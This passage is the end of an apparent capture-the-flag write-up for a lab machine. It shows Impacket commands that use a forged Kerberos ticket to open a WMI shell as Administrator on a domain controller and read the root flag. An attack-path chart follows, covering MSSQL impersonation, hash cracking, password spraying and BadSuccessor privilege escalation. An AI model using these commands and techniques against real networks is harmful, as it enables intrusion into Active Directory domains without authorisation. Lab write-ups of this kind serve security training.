Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=dmsa.ccache
$ proxychains -q faketime -f +7h impacket-wmiexec -no-pass -k dc01.eighteen.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\root.txt
9ef5b03cc0b3b4e...
Attack Path
flowchart TD
    subgraph "Initial Access"
        A(Credentials for kevin) -->|MSSQL| B(Guest Access)
        B -->|Impersonate appdev| C(Access to financial_planner database)
        C -->|Crack hash for admin| D(Admin Credentials)
        B -->|RID Bruteforce| E(List of users)
        D & E -->|Password Spraying| F(Credentials for adam.scott)
        F -->|WinRM| G(Shell as adam.scott)
    end
    subgraph "Privilege Escalation"
        G -->|BadSuccessor| H(Shell as Administrator)
    end
